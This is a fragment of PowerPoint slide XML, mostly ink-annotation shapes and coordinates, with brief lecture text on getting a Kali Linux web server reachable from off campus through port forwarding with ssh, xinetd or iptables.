              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1926393" y="3049672"/>
              <a:ext cx="217800" cy="2448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ADA352F-3350-7941-9AE7-49A3BAE293F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917753" y="3040672"/>
                <a:ext cx="235440" cy="26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A7F05C3A-9BE9-7349-9D55-9E7D48916467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2984793" y="3047152"/>
            <a:ext cx="537480" cy="293760"/>
            <a:chOff x="2984793" y="3047152"/>
            <a:chExt cx="537480" cy="29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C18D68D-1E5D-3C45-938F-283AD3CB23FB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2984793" y="3139672"/>
                <a:ext cx="130320" cy="1764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C18D68D-1E5D-3C45-938F-283AD3CB23F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976153" y="3131032"/>
                  <a:ext cx="1479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1693901-D87B-F649-AAD6-D09369419973}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3116913" y="3197632"/>
                <a:ext cx="168480" cy="1407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1693901-D87B-F649-AAD6-D0936941997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108273" y="3188632"/>
                  <a:ext cx="1861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DB04906-0BBF-5F42-BA42-874896ADE05E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3375393" y="3047152"/>
                <a:ext cx="146880" cy="2937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DB04906-0BBF-5F42-BA42-874896ADE05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366753" y="3038512"/>
                  <a:ext cx="16452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2742A2E-48AB-7D40-8329-37B87D4868DC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3263793" y="3197272"/>
                <a:ext cx="12600" cy="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2742A2E-48AB-7D40-8329-37B87D4868D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54793" y="3188272"/>
                  <a:ext cx="302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D0750C8-E986-2C40-A941-307B81DB0175}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1910553" y="2112952"/>
              <a:ext cx="812160" cy="338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D0750C8-E986-2C40-A941-307B81DB0175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901913" y="2104312"/>
                <a:ext cx="829800" cy="5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7067CDC4-51DA-2142-A185-C1995FBF3B94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1854393" y="1744672"/>
            <a:ext cx="1940040" cy="212040"/>
            <a:chOff x="1854393" y="1744672"/>
            <a:chExt cx="1940040" cy="21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BA2C44C-1960-AF42-BB36-568AB9588725}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1854393" y="1754032"/>
                <a:ext cx="130320" cy="182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BA2C44C-1960-AF42-BB36-568AB958872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845393" y="1745392"/>
                  <a:ext cx="1479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24D5285-BA81-2340-9453-346F6E9E32E8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2058513" y="1781752"/>
                <a:ext cx="129600" cy="160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24D5285-BA81-2340-9453-346F6E9E32E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049873" y="1772752"/>
                  <a:ext cx="1472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0B6AC69-3A00-8B43-8B45-D6A607F807DA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2284233" y="1799032"/>
                <a:ext cx="125640" cy="1576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0B6AC69-3A00-8B43-8B45-D6A607F807D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275593" y="1790392"/>
                  <a:ext cx="1432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FDCE722-199D-6042-8D02-24D9212C6D06}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2456673" y="1794712"/>
                <a:ext cx="132480" cy="1602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FDCE722-199D-6042-8D02-24D9212C6D0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448033" y="1785712"/>
                  <a:ext cx="1501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07604F5-56D8-AC49-9F96-6812BF3EFECA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2894793" y="1789672"/>
                <a:ext cx="899640" cy="320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07604F5-56D8-AC49-9F96-6812BF3EFEC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886153" y="1780672"/>
                  <a:ext cx="9172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3791A3E-2621-FD43-B584-BF48968EC957}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2881473" y="1744672"/>
                <a:ext cx="192240" cy="1490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3791A3E-2621-FD43-B584-BF48968EC95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872833" y="1736032"/>
                  <a:ext cx="209880" cy="16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B912211-827C-D144-A2E0-70235C59EA20}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4128153" y="2020792"/>
              <a:ext cx="787320" cy="712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B912211-827C-D144-A2E0-70235C59EA20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119153" y="2012152"/>
                <a:ext cx="80496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66CE5CAA-2AE4-A341-8818-5D599CA39076}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1971393" y="2150032"/>
              <a:ext cx="834480" cy="176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66CE5CAA-2AE4-A341-8818-5D599CA39076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962753" y="2141032"/>
                <a:ext cx="852120" cy="3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0767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Exposing my Kali web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Kali is unreachable from off campus, as it stands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Let’s see how we can get around this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port forwarding synopsis: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> doesn’t work well, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is good if you need to provide encryption OR it’s the only way through the firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For simple forwards use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or (preferably) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iptables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340816-CBB5-4F45-8FA6-C3CC1D1F6623}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-351687" y="3780472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340816-CBB5-4F45-8FA6-C3CC1D1F66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60327" y="377183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F090A-6139-214B-BE71-299EDD9D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D81CB5-BE7B-5E48-A4A7-C38AE981F05A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1497273" y="2078392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D81CB5-BE7B-5E48-A4A7-C38AE981F0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8273" y="206975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6BD4BFB-DF79-8C4E-9D92-FB89988C9A46}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="504753" y="1958512"/>
              <a:ext cx="567360" cy="495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6BD4BFB-DF79-8C4E-9D92-FB89988C9A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5753" y="1949872"/>
                <a:ext cx="58500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3EDB02B-CA4D-8841-9448-BB4DAD894559}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="456513" y="2236072"/>
              <a:ext cx="899640" cy="441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3EDB02B-CA4D-8841-9448-BB4DAD8945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7873" y="2227072"/>
                <a:ext cx="91728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05F9F40-889D-3E4D-BB68-608A594ADE95}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1548753" y="1900912"/>
              <a:ext cx="297720" cy="327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05F9F40-889D-3E4D-BB68-608A594ADE9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39753" y="1891912"/>
                <a:ext cx="31536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D4C45F7-8821-CF42-B41D-8ECB4EFD0CF3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1873833" y="1895152"/>
              <a:ext cx="182880" cy="297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D4C45F7-8821-CF42-B41D-8ECB4EFD0CF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64833" y="1886152"/>
                <a:ext cx="20052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B5400D3-B885-7E49-809D-A5B4D7D2EDFF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1912713" y="2112952"/>
              <a:ext cx="8928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B5400D3-B885-7E49-809D-A5B4D7D2EDF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04073" y="2103952"/>
                <a:ext cx="1069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F1BA2FC-3A12-E14C-A1E2-47B0F9637FBB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2082633" y="1900912"/>
              <a:ext cx="176040" cy="313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F1BA2FC-3A12-E14C-A1E2-47B0F9637FB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73993" y="1892272"/>
                <a:ext cx="193680" cy="33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84B28D13-53D9-E747-9CE5-D1D77396CBFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2244273" y="2363872"/>
            <a:ext cx="5469120" cy="1131120"/>
            <a:chOff x="2244273" y="2363872"/>
            <a:chExt cx="5469120" cy="113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9E1227C-EA94-DF4D-AB3C-C7E8833C23A7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2244273" y="2565832"/>
                <a:ext cx="3772800" cy="352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9E1227C-EA94-DF4D-AB3C-C7E8833C23A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35273" y="2557192"/>
                  <a:ext cx="379044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86D085E-738F-E147-ADF9-EA0E02090501}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5899713" y="2847712"/>
                <a:ext cx="185400" cy="200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86D085E-738F-E147-ADF9-EA0E0209050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90713" y="2839072"/>
                  <a:ext cx="2030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A0066D8-F19E-BE46-8628-8F1451B4A96A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6192033" y="2795512"/>
                <a:ext cx="173880" cy="569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A0066D8-F19E-BE46-8628-8F1451B4A96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183393" y="2786872"/>
                  <a:ext cx="191520" cy="5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0051292-CDE5-2F4D-A6C5-1D5604158FE1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6113553" y="2363872"/>
                <a:ext cx="900000" cy="469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0051292-CDE5-2F4D-A6C5-1D5604158FE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04913" y="2355232"/>
                  <a:ext cx="91764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1E42FBF-6279-B147-AD40-B32B265E1CC9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6976833" y="2846992"/>
                <a:ext cx="6840" cy="373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1E42FBF-6279-B147-AD40-B32B265E1CC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67833" y="2838352"/>
                  <a:ext cx="2448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54D79F3-950B-9A46-A63B-79C6D0B8D36C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6500913" y="2513632"/>
                <a:ext cx="622800" cy="819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54D79F3-950B-9A46-A63B-79C6D0B8D36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91913" y="2504632"/>
                  <a:ext cx="640440" cy="83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259019F-45F2-9C4F-9B67-B4308F790513}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7059993" y="3241552"/>
                <a:ext cx="189720" cy="220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259019F-45F2-9C4F-9B67-B4308F79051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50993" y="3232552"/>
                  <a:ext cx="2073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0F77B63-AED3-6A4A-8BE2-C2D608685A4D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7312353" y="3230752"/>
                <a:ext cx="23400" cy="160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0F77B63-AED3-6A4A-8BE2-C2D608685A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03353" y="3222112"/>
                  <a:ext cx="410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5414877-7632-F540-B865-D9C9CD7811A9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7412433" y="3230752"/>
                <a:ext cx="108720" cy="83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5414877-7632-F540-B865-D9C9CD7811A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03433" y="3222112"/>
                  <a:ext cx="1263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0CAC1D3-7092-504A-A6F8-A697FECF3104}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7461393" y="3227872"/>
                <a:ext cx="360" cy="180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0CAC1D3-7092-504A-A6F8-A697FECF310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452753" y="3218872"/>
                  <a:ext cx="180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B75C81C-D8FD-4545-859F-0D864A4CBD1C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7569033" y="3264952"/>
                <a:ext cx="360" cy="147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B75C81C-D8FD-4545-859F-0D864A4CBD1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560393" y="3255952"/>
                  <a:ext cx="180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DA36A9A-7EEA-6A40-9E5B-03554BF0AD49}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7565073" y="3132472"/>
                <a:ext cx="360" cy="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DA36A9A-7EEA-6A40-9E5B-03554BF0AD4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556433" y="312347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6B9D551-3036-084E-B358-BDEFB11D6AF7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7610793" y="3315712"/>
                <a:ext cx="101880" cy="1792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6B9D551-3036-084E-B358-BDEFB11D6AF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602153" y="3306712"/>
                  <a:ext cx="1195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879435F-42D3-D244-9D7B-9E3BFFCA036D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7635993" y="3359992"/>
                <a:ext cx="77400" cy="514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879435F-42D3-D244-9D7B-9E3BFFCA036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627353" y="3351352"/>
                  <a:ext cx="95040" cy="6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4693201-C369-9346-AB14-1120075DDF9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7085553" y="1877152"/>
            <a:ext cx="1161360" cy="329760"/>
            <a:chOff x="7085553" y="1877152"/>
            <a:chExt cx="1161360" cy="32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5AC9A65-A66B-4B47-9E49-DE971DC8161E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7085553" y="1985512"/>
                <a:ext cx="249840" cy="181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5AC9A65-A66B-4B47-9E49-DE971DC8161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076553" y="1976872"/>
                  <a:ext cx="2674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1ABB220-F34E-9B47-B20A-F9F87B3E85A8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7392993" y="1936192"/>
                <a:ext cx="153720" cy="184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1ABB220-F34E-9B47-B20A-F9F87B3E85A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383993" y="1927552"/>
                  <a:ext cx="1713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D0E91FB-2EF2-CA42-B812-1F1C16150EB8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7634553" y="1927912"/>
                <a:ext cx="126360" cy="179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D0E91FB-2EF2-CA42-B812-1F1C16150EB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625553" y="1918912"/>
                  <a:ext cx="1440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B3E26BD-1EE8-C24D-8F5D-EC7FFF5EE270}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7837953" y="1877152"/>
                <a:ext cx="151920" cy="189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B3E26BD-1EE8-C24D-8F5D-EC7FFF5EE27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829313" y="1868512"/>
                  <a:ext cx="1695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E9D5C91-029F-A548-9548-B9C5A11CE9A5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8060073" y="1936912"/>
                <a:ext cx="186840" cy="270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E9D5C91-029F-A548-9548-B9C5A11CE9A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051433" y="1928272"/>
                  <a:ext cx="204480" cy="28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57F1931-229E-554F-9DE2-B694FE8B24E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2148513" y="5350792"/>
            <a:ext cx="429840" cy="302400"/>
            <a:chOff x="2148513" y="5350792"/>
            <a:chExt cx="429840" cy="30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9C418D9-C7C1-5B42-A99C-5686EABDEFC4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2148513" y="5350792"/>
                <a:ext cx="222480" cy="241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9C418D9-C7C1-5B42-A99C-5686EABDEFC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139873" y="5342152"/>
                  <a:ext cx="2401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64585FA-4BB1-1943-ABD2-B142A3A07A6D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2448033" y="5377432"/>
                <a:ext cx="130320" cy="2757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64585FA-4BB1-1943-ABD2-B142A3A07A6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439033" y="5368792"/>
                  <a:ext cx="147960" cy="29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08C2AC0-8591-0949-AF98-47595226E8BB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7323153" y="2253352"/>
              <a:ext cx="990000" cy="720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08C2AC0-8591-0949-AF98-47595226E8B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314153" y="2244712"/>
                <a:ext cx="1007640" cy="8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970DAB94-BC6F-7E44-9597-F690783BA48E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="822993" y="3364672"/>
            <a:ext cx="5315760" cy="1712880"/>
            <a:chOff x="822993" y="3364672"/>
            <a:chExt cx="5315760" cy="171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78DA327-18D3-4043-AFE0-A16E33539D07}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="839193" y="3714952"/>
                <a:ext cx="172440" cy="240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78DA327-18D3-4043-AFE0-A16E33539D0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30553" y="3706312"/>
                  <a:ext cx="1900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383A97F-8E1E-0248-B09D-09E915EFD74D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1098393" y="3790552"/>
                <a:ext cx="360" cy="208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383A97F-8E1E-0248-B09D-09E915EFD74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89753" y="3781552"/>
                  <a:ext cx="180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ABDFE35-E9A1-1047-B309-425A7130F7C6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1055193" y="3755272"/>
                <a:ext cx="201240" cy="2422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ABDFE35-E9A1-1047-B309-425A7130F7C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46553" y="3746632"/>
                  <a:ext cx="2188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5BDD1C3-393A-7847-8D39-EDA413AAB396}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1360473" y="3810712"/>
                <a:ext cx="131760" cy="180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5BDD1C3-393A-7847-8D39-EDA413AAB39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351473" y="3802072"/>
                  <a:ext cx="1494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CC92BF9-D315-6046-8463-5B353139410C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1537593" y="3794512"/>
                <a:ext cx="123840" cy="554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CC92BF9-D315-6046-8463-5B353139410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528593" y="3785512"/>
                  <a:ext cx="1414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B280E16-EDF2-D445-839F-7CB8D75E290B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1587993" y="3714592"/>
                <a:ext cx="37440" cy="276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B280E16-EDF2-D445-839F-7CB8D75E290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579353" y="3705592"/>
                  <a:ext cx="550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57DD3DE-DFD2-4E4F-B328-9F50CD831FD7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2722713" y="3408592"/>
                <a:ext cx="3248280" cy="12733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57DD3DE-DFD2-4E4F-B328-9F50CD831FD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714073" y="3399952"/>
                  <a:ext cx="3265920" cy="12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BA64BDE-47DC-5F4A-8734-136E80778B0C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5819073" y="3364672"/>
                <a:ext cx="306360" cy="2458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BA64BDE-47DC-5F4A-8734-136E80778B0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810073" y="3355672"/>
                  <a:ext cx="3240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1B49595-B1F0-F04F-87C3-948BC5676018}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4017633" y="4397152"/>
                <a:ext cx="176400" cy="2516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1B49595-B1F0-F04F-87C3-948BC567601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008633" y="4388152"/>
                  <a:ext cx="1940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4531EA6-B8D3-CD45-99EF-DFDAF5AC18A0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4254153" y="4388152"/>
                <a:ext cx="147240" cy="1908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4531EA6-B8D3-CD45-99EF-DFDAF5AC18A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245513" y="4379152"/>
                  <a:ext cx="1648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41478E2-8D52-8D46-A0F3-0FB615F2FE2B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4470153" y="4206352"/>
                <a:ext cx="150840" cy="3168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41478E2-8D52-8D46-A0F3-0FB615F2FE2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461513" y="4197712"/>
                  <a:ext cx="1684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4FAC245-EAF4-514D-B57F-02D675C81080}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2745393" y="3397792"/>
                <a:ext cx="3277440" cy="13489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4FAC245-EAF4-514D-B57F-02D675C8108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736393" y="3388792"/>
                  <a:ext cx="3295080" cy="13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CA97F2E-9AB4-1E40-88ED-D68EAA47BA47}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5783073" y="3378352"/>
                <a:ext cx="298800" cy="2660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CA97F2E-9AB4-1E40-88ED-D68EAA47BA4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774433" y="3369352"/>
                  <a:ext cx="31644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2E87F46-3F90-3C40-9826-C3B85EE9ECF0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="822993" y="4331272"/>
                <a:ext cx="1107000" cy="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2E87F46-3F90-3C40-9826-C3B85EE9ECF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14353" y="4322632"/>
                  <a:ext cx="1124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DB1B599-0448-6D4D-9EA7-12B49750573E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1659993" y="4724752"/>
                <a:ext cx="19440" cy="278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DB1B599-0448-6D4D-9EA7-12B49750573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651353" y="4716112"/>
                  <a:ext cx="3708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7DFC21E-FDA1-D849-8B27-F1D3BBAA4860}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1745673" y="4740232"/>
                <a:ext cx="195480" cy="225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7DFC21E-FDA1-D849-8B27-F1D3BBAA486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737033" y="4731232"/>
                  <a:ext cx="2131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666221A-B6DD-2847-8DF9-13E3F1ED5C42}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1955913" y="4658872"/>
                <a:ext cx="325440" cy="4186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666221A-B6DD-2847-8DF9-13E3F1ED5C4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946913" y="4649872"/>
                  <a:ext cx="34308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D7C7911-AA64-814F-8398-2045AE214FDB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2383593" y="4860832"/>
                <a:ext cx="360" cy="1335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D7C7911-AA64-814F-8398-2045AE214FD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374953" y="4851832"/>
                  <a:ext cx="180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2C8207B-6E2B-A541-922E-722CFB82F5F7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2364513" y="4752112"/>
                <a:ext cx="360" cy="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2C8207B-6E2B-A541-922E-722CFB82F5F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55873" y="47431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DA47451-7EF1-364C-8780-CB11CC9495E5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2681673" y="4470592"/>
                <a:ext cx="588240" cy="5061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DA47451-7EF1-364C-8780-CB11CC9495E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672673" y="4461592"/>
                  <a:ext cx="60588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B47A2FD-16E2-5741-93CB-D661E1318E3A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
